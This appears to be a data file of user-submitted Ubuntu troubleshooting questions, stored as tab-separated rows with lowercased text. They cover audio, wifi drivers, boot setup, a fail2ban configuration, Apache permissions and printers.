340150	how do i stop qsynth from shutting off all other sounds on my system until i reboot the computer ?	i use qsynth to output sound from my midi keyboard . that part works great , and the midi keyboard sounds great . however , once that midi keyboard is connected , my computer immediately becomes unable to output any sounds other than sounds from the midi keyboard , and this continues until i reboot the computer , even if i stop and close both qsynth and qjackctl . i have no idea what 's causing this , but i find it really annoying . how can i stop it from happening ? my ubuntu version is 13.04 ( raring ) and i have qsynth 0.3.6 and qjackctl 0.3.9 . my system uses pulseaudio 1:3.0-0ubuntu6 to output sound , which i 've heard has some problems but i 'm not sure if this is one of them .
340154	fail2ban block retry count always changes	as title mentions clearly , fail2ban block retry count always changes . i set all retry counts to 3 ; but sometimes it blocks me after 6 or 7 retries . how can set its behavior a constant value ? i added my jail.local file 's content below . by the way server 12.04 64 bit is running on all hosts . jail.local # fail2ban configuration file . # # this file was composed for debian systems from the original one # provided now under /usr/share/doc/fail2ban/examples/jail.conf # for additional examples . # # to avoid merges during upgrades do not modify this file # and rather provide your changes in /etc/fail2ban/jail.local # # author : yaroslav o. halchenko < debian @ onerussian.com > # # $ revision : 281 $ # # the default allows a global definition of the options . they can be override # in each jail afterwards . [ default ] # `` ignoreip '' can be an ip address , a cidr mask or a dns host ignoreip = 127.0.0.1 bantime = 600 maxretry = 3 # `` backend '' specifies the backend used to get files modification . available # options are `` gamin '' , `` polling '' and `` auto '' . # yoh : for some reason debian shipped python-gamin did n't work as expected # this issue left todo , so polling is default backend for now backend = polling # # destination email address used solely for the interpolations in # jail . { conf , local } configuration files . destemail = root @ localhost # # actions # # default banning action ( e.g . iptables , iptables-new , # iptables-multiport , shorewall , etc ) it is used to define # action_* variables . can be overriden globally or per # section within jail.local file banaction = iptables-multiport # email action . since 0.8.1 upstream fail2ban uses sendmail # mta for the mailing . change mta configuration parameter to mail # if you want to revert to conventional 'mail ' . mta = sendmail # default protocol protocol = tcp # # action shortcuts . to be used to define action parameter # the simplest action to take : ban only action_ = % ( banaction ) s [ name= % ( __name__ ) s , port= '' % ( port ) s '' , protocol= '' % ( protocol ) s ] # ban & send an e-mail with whois report to the destemail . action_mw = % ( banaction ) s [ name= % ( __name__ ) s , port= '' % ( port ) s '' , protocol= '' % ( protocol ) s ] % ( mta ) s-whois [ name= % ( __name__ ) s , dest= '' % ( destemail ) s '' , protocol= '' % ( protocol ) s ] # ban & send an e-mail with whois report and relevant log lines # to the destemail . action_mwl = % ( banaction ) s [ name= % ( __name__ ) s , port= '' % ( port ) s '' , protocol= '' % ( protocol ) s ] % ( mta ) s-whois-lines [ name= % ( __name__ ) s , dest= '' % ( destemail ) s '' , logpath= % ( logpath ) s ] # choose default action . to change , just override value of 'action ' with the # interpolation to the chosen action shortcut ( e.g . action_mw , action_mwl , etc ) in jail.local # globally ( section [ default ] ) or per specific section action = % ( action_ ) s # # jails # # next jails corresponds to the standard configuration in fail2ban 0.6 which # was shipped in debian . enable any defined here jail by including # # [ section_name ] # enabled = true # # in /etc/fail2ban/jail.local . # # optionally you may override any other parameter ( e.g . banaction , # action , port , logpath , etc ) in that section within jail.local [ ssh ] enabled = true port = ssh filter = sshd logpath = /var/log/auth.log maxretry = 3 # generic filter for pam . has to be used with action which bans all ports # such as iptables-allports , shorewall [ pam-generic ] enabled = false # pam-generic filter can be customized to monitor specific subset of 'tty's filter = pam-generic # port actually must be irrelevant but lets leave it all for some possible uses port = all banaction = iptables-allports port = anyport logpath = /var/log/auth.log maxretry = 3 [ xinetd-fail ] enabled = false filter = xinetd-fail port = all banaction = iptables-multiport-log logpath = /var/log/daemon.log maxretry = 2 [ ssh-ddos ] enabled = false port = ssh filter = sshd-ddos logpath = /var/log/auth.log maxretry = 3 # # http servers # [ apache ] enabled = false port = http , https filter = apache-auth logpath = /var/log/apache*/*error.log maxretry = 3 # default action is now multiport , so apache-multiport jail was left # for compatibility with previous ( < 0.7.6-2 ) releases [ apache-multiport ] enabled = false port = http , https filter = apache-auth logpath = /var/log/apache*/*error.log maxretry = 3 [ apache-noscript ] enabled = false port = http , https filter = apache-noscript logpath = /var/log/apache*/*error.log maxretry = 3 [ apache-overflows ] enabled = false port = http , https filter = apache-overflows logpath = /var/log/apache*/*error.log maxretry = 2 # # ftp servers # [ vsftpd ] enabled = false port = ftp , ftp-data , ftps , ftps-data filter = vsftpd logpath = /var/log/vsftpd.log # or overwrite it in jails.local to be # logpath = /var/log/auth.log # if you want to rely on pam failed login attempts # vsftpd 's failregex should match both of those formats maxretry = 3 [ proftpd ] enabled = false port = ftp , ftp-data , ftps , ftps-data filter = proftpd logpath = /var/log/proftpd/proftpd.log maxretry = 3 [ wuftpd ] enabled = false port = ftp , ftp-data , ftps , ftps-data filter = wuftpd logpath = /var/log/auth.log maxretry = 3 # # mail servers # [ postfix ] enabled = false port = smtp , ssmtp filter = postfix logpath = /var/log/mail.log [ couriersmtp ] enabled = false port = smtp , ssmtp filter = couriersmtp logpath = /var/log/mail.log # # mail servers authenticators : might be used for smtp , ftp , imap servers , so # all relevant ports get banned # [ courierauth ] enabled = false port = smtp , ssmtp , imap2 , imap3 , imaps , pop3 , pop3s filter = courierlogin logpath = /var/log/mail.log [ sasl ] enabled = false port = smtp , ssmtp , imap2 , imap3 , imaps , pop3 , pop3s filter = sasl # you might consider monitoring /var/log/warn.log instead # if you are running postfix . see http : //bugs.debian.org/507990 logpath = /var/log/mail.log # dns servers # these jails block attacks against named ( bind9 ) . by default , logging is off # with bind9 installation . you will need something like this : # # logging { # channel security_file { # file `` /var/log/named/security.log '' versions 3 size 30m ; # severity dynamic ; # print-time yes ; # } ; # category security { # security_file ; # } ; # } ; # # in your named.conf to provide proper logging # word of caution : # given filter can lead to dos attack against your dns server # since there is no way to assure that udp packets come from the # real source ip [ named-refused-udp ] enabled = false port = domain,953 protocol = udp filter = named-refused logpath = /var/log/named/security.log [ named-refused-tcp ] enabled = false port = domain,953 protocol = tcp filter = named-refused logpath = /var/log/named/security.log
340155	remove nautilus file selector from the default	how do i change the default file selector ? i already did this : set nemo as default file manager in ubuntu but it does n't work . nautilus still is the default .
340156	install ubuntu from iso image directly from hard disk of a system running linux ?	i do n't want to burn a cd , dvd or usb memory stick . and i do n't care about saving the existing operating system ( linux mint ) . i want to install ubuntu ( actually kubuntu 12.04 lts ) to the computer directly from the iso image . the image is for the kubuntu live dvd ( 3.5 gb ) . the computer is now booted into linux mint . a set of command line steps would be satisfactory . in my mind , i simply need to trick the existing system into thinking i inserted a cd/dvd , right ? i know there is a similar question already but it does not have a good answer . the answer basically says , `` see this link . '' i reviewed the link and i decided that stackexchange needs a good answer to this question . furthermore , most answers at other places on the internet assume the user is coming to ubuntu from windows . so i think this question is one that needs a good answer here . thanks
340162	will windows fixmbr upset ubuntu	i have a home pc dual booting windowx xp with ubuntu 12.04 . i have been using gparted and changing some sizes of various partitions to use some extra available free space . it occurred to me that if i upset anything i can rescue the windows mbr using various approaches including the windows/dos fdisk method , but would that effectively destroy ubuntu/grub boot loading by resetting the boot record back to the original windows xp entry only ? perhaps it 's a strange question and i hope that makes sense .
340164	how can i get unformatted ip address information in the shell ?	i 'm writing a shell script which needs information on the state of the network connection - the basic stuff like ip address , subnet , netmask and so on . i could just use ifconfig and sed/grep for the information , but i was hoping there was a cleaner way to do this - possibly using the ip command , or similar utilities . i 'm looking for something which could give the following results : $ ( magic command ) ip 192.168.1.1 $ ( magic command ) netmask 255.255.255.0 $ ( magic command ) subnet 192.168.0.0 and possibly similar things for network gateway/dns servers . does such a command exist ? perhaps there 's an -- unformatted flag for ip or ifconfig ? am i too hopeful/naive ? thanks : )
340165	how to configure wireless 'n ' for bcm4313	i screwed up my wifi . i tried and connected yesterday . now , my wifi is gone ! now , i noticed that 802.11 abg are available . but , 802.11n is not available ... output of iwconfig : eth2 ieee 802.11abg essid : '' kongu_wifi '' mode : managed frequency:2.462 ghz access point : 00:23:68:76 : a6 : a1 retry long limit:7 rts thr : off fragment thr : off power management : off now , how to solve this problem ? i 'm on 12.04.3 i have got this output by running iwlist scan eth0 interface does n't support scanning . eth2 scan completed : cell 01 - address : 00:23:68:50 : cc:28 channel:1 frequency:2.412 ghz ( channel 1 ) quality=38/70 signal level=-72 dbm encryption key : on essid : '' kongu_wifi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 3500ms ago ie : unknown : 000a4b6f6e67755f57696669 ie : unknown : 010882848b0c12961824 ie : unknown : 030101 ie : unknown : 0706494e49010d24 ie : unknown : 0b05000082093d ie : unknown : 2a0104 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : 802.1x ie : unknown : 32043048606c ie : unknown : ad0f00a0f8020011002a00140084972352 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : 802.1x ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1600a0f801010100000000000000000002000000000000 cell 02 - address : 00:23:68:76 : a6 : e0 channel:6 frequency:2.437 ghz ( channel 6 ) quality=33/70 signal level=-77 dbm encryption key : on essid : '' kongu_wifi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 3500ms ago ie : unknown : 000a4b6f6e67755f57696669 ie : unknown : 010882848b0c12961824 ie : unknown : 030106 ie : unknown : 0706494e20010d1e ie : unknown : 2a0104 ie : unknown : 32043048606c ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : 802.1x ie : unknown : 0b0502001e127a ie : unknown : 2d1a0c0017ffff000000000000000000000000000000000000000000 ie : unknown : 3d1606081f00000000000000000000000000000000000000 ie : unknown : 4a0e14000a00b4001400140002000a00 ie : unknown : 7f050100000000 ie : unknown : ad0f00a0f8020026006100000085972352 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : 802.1x ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1a00a0f803000100000000000068644bbf0008000600236886385c cell 03 - address : 00:23:68:76 : a6 : a1 channel:11 frequency:2.462 ghz ( channel 11 ) quality=44/70 signal level=-66 dbm encryption key : on essid : '' kongu_wifi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 3500ms ago ie : unknown : 000a4b6f6e67755f57696669 ie : unknown : 010882848b0c12961824 ie : unknown : 03010b ie : unknown : 0706494e49010d1e ie : unknown : 2a0104 ie : unknown : 32043048606c ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : 802.1x ie : unknown : 0b05080014127a ie : unknown : 2d1a0c0017ffff000000000000000000000000000000000000000000 ie : unknown : 3d160b081f00000000000000000000000000000000000000 ie : unknown : 4a0e14000a00b4001400140002000a00 ie : unknown : 7f050100000000 ie : unknown : ad0f00a0f8080023005600000083972352 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : 802.1x ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1a00a0f803000100000000000068644bbf00080006002368863878 cell 04 - address : 00:23:68:75 : b4 : e0 channel:11 frequency:2.462 ghz ( channel 11 ) quality=33/70 signal level=-77 dbm encryption key : on essid : '' kongu_wifi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 3500ms ago ie : unknown : 000a4b6f6e67755f57696669 ie : unknown : 010882848b0c12961824 ie : unknown : 03010b ie : unknown : 0706494e49010d1e ie : unknown : 2a0104 ie : unknown : 32043048606c ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : 802.1x ie : unknown : 0b050a0014127a ie : unknown : 2d1a0c0017ffff000000000000000000000000000000000000000000 ie : unknown : 3d160b081f00000000000000000000000000000000000000 ie : unknown : 4a0e14000a00b4001400140002000a00 ie : unknown : 7f050100000000 ie : unknown : ad0f00a0f80a006800b800000085972352 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : 802.1x ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1a00a0f803000100000000000068644bbf000a0001002368863888 cell 05 - address : 00:23:68:50 : cd:98 channel:1 frequency:2.412 ghz ( channel 1 ) quality=38/70 signal level=-72 dbm encryption key : on essid : '' kongu_wifi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 3500ms ago ie : unknown : 000a4b6f6e67755f57696669 ie : unknown : 010882848b0c12961824 ie : unknown : 030101 ie : unknown : 0706494e49010d24 ie : unknown : 0b0500008f093d ie : unknown : 2a0104 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : 802.1x ie : unknown : 32043048606c ie : unknown : ad0f00a0f8040029007100140084972352 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : 802.1x ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1600a0f801010100000000000000000003000000000000 cell 06 - address : 00:23:68:50 : d5 : a4 channel:1 frequency:2.412 ghz ( channel 1 ) quality=34/70 signal level=-76 dbm encryption key : on essid : '' kongu_wifi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 3500ms ago ie : unknown : 000a4b6f6e67755f57696669 ie : unknown : 010882848b0c12961824 ie : unknown : 030101 ie : unknown : 0706494e49010d24 ie : unknown : 0b05000087093d ie : unknown : 2a0104 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : 802.1x ie : unknown : 32043048606c ie : unknown : ad0f00a0f8040036008a00140084972352 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : 802.1x ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1600a0f801010100000000000000000001000000000000 cell 07 - address : 00:23:68:50 : a6:00 channel:6 frequency:2.437 ghz ( channel 6 ) quality=19/70 signal level=-91 dbm encryption key : on essid : '' kongu_wifi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 21752ms ago ie : unknown : 000a4b6f6e67755f57696669 ie : unknown : 010882848b0c12961824 ie : unknown : 030106 ie : unknown : 0706494e49010d24 ie : unknown : 0b0500005a093d ie : unknown : 2a0104 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : 802.1x ie : unknown : 32043048606c ie : unknown : ad0f00a0f803006b00a900140072972352 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : 802.1x ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1600a0f801010100000000000000000003000000000000 cell 08 - address : 00:23:68:5b:93:10 channel:1 frequency:2.412 ghz ( channel 1 ) quality=33/70 signal level=-77 dbm encryption key : on essid : '' kongu_wifi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 3500ms ago ie : unknown : 000a4b6f6e67755f57696669 ie : unknown : 010882848b0c12961824 ie : unknown : 030101 ie : unknown : 0706494e49010d24 ie : unknown : 0b05000085093d ie : unknown : 2a0106 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : 802.1x ie : unknown : 32043048606c ie : unknown : ad0f00a0f8050015003500140084972352 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : 802.1x ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1600a0f801010100000000000000000001000000000000 cell 09 - address : 00:23:68:75 : a7:51 channel:6 frequency:2.437 ghz ( channel 6 ) quality=27/70 signal level=-83 dbm encryption key : on essid : '' kongu_wifi '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 6 mb/s ; 9 mb/s 11 mb/s ; 12 mb/s ; 18 mb/s bit rates:24 mb/s ; 36 mb/s ; 48 mb/s ; 54 mb/s mode : master extra : tsf=0000000000000000 extra : last beacon : 3500ms ago ie : unknown : 000a4b6f6e67755f57696669 ie : unknown : 010882848b0c12961824 ie : unknown : 030106 ie : unknown : 050401020000 ie : unknown : 0706494e49010d1e ie : unknown : 2a0104 ie : unknown : 32043048606c ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 2 ) : tkip ccmp authentication suites ( 1 ) : 802.1x ie : unknown : 0b05080035127a ie : unknown : 2d1a0c0017ffff000000000000000000000000000000000000000000 ie : unknown : 3d1606081f00000000000000000000000000000000000000 ie : unknown : 4a0e14000a00b4001400140002000a00 ie : unknown : 7f050100000000 ie : unknown : ad0f00a0f80800a7007a01000082972352 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : 802.1x ie : unknown : dd070050f202000180 ie : unknown : dd1a00a0f80300010000000
340166	updates are not installing	when i try to update any programs , it does not work , error message says files are missing . i have not tried anything to fix this issue .
340172	gaming mouse not moving/working	i am having a bit of a problem with my gaming mouse ( leetgion hellion ) that works fine in windows . i have just installed ubuntu 13.10 ( 32bit ) and the house just does not respond in any way . any help will be appreciated , thanks .
340174	trying to troubleshoot sound card issues	i 'm trying to follow the article : https : //help.ubuntu.com/community/soundtroubleshooting i 'm on step five where it says to run the command : sudo apt-get install linux-restricted-modules-`uname -r` linux-generic but when i do , i 'm getting the following error message : devbox : / $ sudo apt-get install linux-restricted-modules-'uname-r ' linux-generic reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-restricted-modules-uname-r am i supposed to substitute uname with something ? sorry , i 'm still pretty green with linux . thanks .
340175	manual partitioning help	i want to tri-boot my hp g6 laptop . i wana install windows , ubuntu and linux kali using uefi.. i want to install them making manual partitions ... first m installing windows ... for that following partition were created - windows boot parttion a 100 mb efi partition and a 300 mb recovery partition now m installing ubuntu 13.04 and then linux kali using uefi boot.. while doing manual partition i created a ext4 partition for ubuntu . so my qustion is , - as windows has already created 100 mb efi partition do i have create again efi partition for ubuntu and then again another efi partition for linux kali ? and secondly , ubuntu requires a swap partition , so do i need to create again another swap partition while installing linux kali ? please help..
340179	no network after cold boot ; but works after reboot	i 've just installed 13.04 from scratch on a ( very fast ) machine that only has wired ethernet . it looks as if it boots so fast that the ethernet card ca n't keep up ; it wo n't ever connect to the home lan from a cold boot , but a reboot consistently solves the problem . the machine is blazingly fast and goes from power-on to user desktop in less than ten seconds . i 'm running an 8-core intel i7 with ssd and 16gb ram ; the network card is some intel gigabit card . the machine is set up to log me in automatically , and firefox is among the startup programs . firefox always complains that it has no network connection because ( even after a warm reboot ) the network only connects a while after the user desktop appears . when the user desktop appears , there is a unity popup that says `` disconnected , you are now offline '' and it is replaced by a `` connected '' popup roughly 20 seconds later . this was not a problem on windows . 1 ) why does n't the computer connect to the lan until after the user login ? 2 ) why does n't the computer connect to the lan after a cold boot ? and obviously : how can i fix this ? edits : i 'm using my router 's dhcp , not static ip . output of cat /etc/network/interfaces is as follows ( when the computer has lan connection ) : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback output of sudo ethtool eth0 is : settings for eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : no advertised auto-negotiation : yes speed : 100mb/s duplex : full port : twisted pair phyad : 2 transceiver : internal auto-negotiation : on mdi-x : off supports wake-on : pumbg wake-on : g current message level : 0x00000007 ( 7 ) drv probe link link detected : yes note : the network should be gigabit , not just 100mbps , but i have n't figured that one out yet either .
340181	wifi is not working in 12.04.3 lts 64 bit version	the same driver for my wireless card that worked in the 32 bit version of ubuntu 12.04 , fail to install after i upgraded to the 64 bit version . broadcom sta driver this package contains broadcom 802.11 linux sta wireless driver for use with broadcom 's bcm4311- , bcm4312- , bcm4313- , bcm4321- , bcm4322- , bcm43224- , and bcm43225- , bcm43227- and bcm43228-based hardware.lcpi : my wireless is network controller : broadcom corporation bcm43142 802.11b/g/n ( rev 01 ) if this package is n't for my wifi card then how do i get a package that will will be compatible ? where would i start looking ? my laptop is a dell inspiron 3520description intel core i3-2350m dual core processor 4gb pc3-12800 ddr3 memory 500gb 5400rpm sata hard drive 8x dvd+/-rw dual layer burner 15.6 '' wxga ( 1366x768 ) display with 1.0 megapixel webcam intel hd graphics 3000 integrated graphics fast ethernet , 802.11b/g/n wireless , bluetooth three usb 2.0 , hdmi , vga , 3-in-1 card reader 14.8 '' x 10.2 '' x 1.4 '' @ 5.2 lbs . error message sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log i hope this is helpful `` 2013-09-01 12:09:04,635 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted ''
340184	how do i install java 6 for use in chrome ?	i 'm using an application for my employee timecards update . it will only run with java version 6 . now after switching to google chrome , i 'm facing an issue with this application . how do i install and use the older version of java on chrome without being notified by chrome browser everytime ? i had tried the steps to add flag on chrome /icon/target , but it is not working .
340185	relative include and library paths	i am installing a program called voro++ , but that is beside the point . the issue is , in the makefile that comes with this program there are these lines , which the author instructs you to modify as necessary : / # relative include and library paths for compilation of the examples e_inc=-i../../src e_lib=-l../../src any idea if i should edit these ? i am unfamiliar with the concept of include and library paths , maybe i should look into that first . this seems to be a very specific kind of issue , sorry about that and no hard feelings if the question does n't make any sense to anyone . here is the link to the software site : http : //math.lbl.gov/voro++/about.html . here is what the readme says : '' to begin , the user should review the file `` config.mk '' in the top level directory , to make sure that the compilation and installation settings are appropriate for their system . typing `` make '' will then compile the static library , command-line utility , and examples . the command-line utility and library will appear within the `` src '' directory . '' i followed the steps exactly , and the program works fine . but why are there those `` . . . '' in the include and lib paths ? does that mean i should replace the `` . . . `` with something in particular ? also , there is no / in `` # relative include . . . '' part above . i had to put it , or else the site makes everything bold and large . thanks mel
340194	how to convert a mac bios boot to efi boot ?	i am running kubuntu 13.04 on my macbook pro ( 8,2 ) and i have it set up to boot through apple 's bios emulation . i would like to use the intel instead of the ati graphics card . this means that i will need to get the system to boot via efi . i do n't want to do a clean install . the furtherest i can get is into grub-efi , but i can not actually boot the kernel from there . my partition scheme : /dev/sda1 = efi /dev/sda2 = mac os /dev/sda3 = root /dev/sda4 = boot /dev/sda5 = home /dev/sda6 = swap how can i achieve efi booting on a bios booting install without loosing my existing os installations ?
340197	terminal does n't show up in the launcher	note : this question : terminal does not appear in launcher is very similar , but it was for 12.04 . will those answers still work in 13.04 ? i recently reinstalled ubuntu and i was updating/installing my programs and i noticed that terminal did n't show up on the launcher bar or in the alt+tab window-thingy . this is somewhat annoying , as if i minimize the windows they are lost as far i can tell .
340202	what should i do when receiving error notifications by the system	i am often getting the message : sorry , ubuntu 12.04 has experienced an internal error . if you notice further problems , try restarting the computer . i am worried about my system stability . what have i done that may cause this problem ? is it my fault ? what can i do to solve this issue ?
340203	wifi problem with relocated hard drive on ubuntu 13.04	i was having trouble installing ubuntu on my desktop seemingly because of the graphics card in it . so instead i installed in onto a hdd on my laptop and everything seemed to be working ok. now when i swapped the disk back into my desktop i can not seem to get wifi to work . i have tried following some tutorials to no avail . one thing i am trying is going to the additional software section of software & updates and when i see what looks like a wifi card i click to use a driver instead of not to use at all and it always just puts the check mark back onto do not use . any ideas as to what might have happened and how to fix it ? thanks !
340204	zynaddsubfx error message ; it wo n't initialize	i am tying to use zynaddsubfx with qjackctl and midi . i have it connected , and the configurations are set . this is what i see when i open zynaddsubfx : default i/o did not initialize . defaulting to null backend . what does this mean and how do i fix this ? thank you all in advance .
340210	toshiba c875d-s7330 windows 8 booting clean install	does anyone know about the issue of windows 8 writing their license key to the bios ? is this an issue to get a clean install of ubuntu ? by the way , there are no longer coa stickers on oem built machines running the dreaded `` 8 '' . i will report back when i have actually attempted to install ubuntu-13.04-desktop-amd64 . apparently there are issues just trying to install any older version of windows on the new windows 8 oem built products because of the bios has the product key embedded in it . it is not like the days past . i was just asking if anyone has seen this before , according to some older threads i have since read here , i may have found my answer . just getting into the bios on some toshiba 's can be a pain . it would seem as if windows now thinks they own your machine with this bios issue and totally takes control of the boot order . thanks all ( noobe here ) peace
340212	403 forbidden clean apache2 install	i recently reinstalled ubuntu and then installed the lamp-server bundle via tasksel and the installation went fine . i had backed up the files from the /var/www/ folder and planned to just place them back once the server was back online ( or in my case , accesible from my computer only - it 's a test server . ) the installation completed and so i tried to copy the files over from the backup directory . this went fine . however , when i try to access the server via localhost from firefox i get a 403 forbidden error , which i never had before . help ! ! edit : 9/2/2013 added info about file happenings so , i followed what @ andrew said , but i still ca n't access any .html files . strangely enough , i can access the .php files ( nothing displayed of course , as they only display the info pulled from a previously completed form . ) but no html access , just the forbidden you do n't have permission to access /index.html on this server . page
340215	lexmark x7675 printer driver needed	does anyone have a copy of the lexmark printer x7675 driver for ubuntu 13.04 or debian ? lexmark no longer supports this printer apparently . i visit a site that gave a link that no longer works for a download . if any has this file or an equivalent , please make it available somehow . thanks , daniel file needed : lexmark-08z-series-driver-1.0-1.i386.deb.sh.tar.gz or one that works .
340217	network drivers for ubuntu 12.04	i have an older dell inspirion 1720 laptop ( came with xp , upgraded to vista some time ago.. ) rather than retire it i thought to try to install ubuntu 12.04 in order to familiarize myself with linux/ubuntu ... install went smoothly , but it [ ubuntu ] would not recognize either of the integrated network components ( ethernet or wireless ) . what drivers can i/should i use to get the wireless ( dw1395 ) working ? where can i download those drivers ? how do i install those drivers ? ( once i am networked i 'm guessing ( from what i have read ) the rest of the drivers i need will probably be pretty easy ... ) [ note : i have already tried various google searches , but have not found a working answer ]
340222	how can i fully remove/delete ubuntu one ?	i deleted ubuntu one over 2 weeks ago and today it began downloading my files to ubuntu one ! i checked and it does not show in my installed programs . how can i delete ubuntu one ? i do not want it , i do not like it ! thank you !
340223	ubuntu 13.04 on uefi system hangs at black screen	ok , so it seems this question has been asked before but not successfully answered . i have a windows 8 toshiba p75-a7200 , and i 've disabled secure boot , fast boot , and fast startup . still , when i try to boot a ubuntu 13.04 usb installer , i get to the grub screen and when i select `` try ubuntu before installing , '' it hangs on a black screen . i had also tried booting in legacy mode , and it was the same . the answers that i 've seen have n't helped me , since they seem to assume i can access the ubuntu terminal ? i 've read this : my computer boots to a black screen , what options do i have to fix it ? but disabling secure boot and enabling bios legacy mode did n't help . my computer does n't have an uefi/bios option ; only uefi or bios . same with this : installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) it suggests the same things , which do n't work . they both assume that i can get to the ubuntu installer . i 've also tried to install linux mint , and it was still unresponsive . i used 64bit for both , of course . so ubuntu is supposed to be able to work with uefi and secure boot . what 's going wrong ? ps it is a black screen , not a purple screen , so i do n't think the problem is my video drivers , because i 've had that happen on another computer . i know the problem is the uefi , since i 've installed linux on three other windows 7 computers just fine . edit : dd just try to switch to nomodeset , and that took me to the ubuntu command line . i tried startx which resulted in an error , so i am lost on how to proceed ?
340225	usb without a hard drive	i 'm running a dell latitude xt that the hardcover went bad in , and , being an ide computer , the hard drives are expensive , so i was trying to run ubuntu straight from a usb our zip drive . i have downloaded linux live usb , but every time i format the usb drive that i want to use it comes up with an error saying that there is no operating system . how can i fix this problem ? this is a second laptop that my kids use and do n't want .
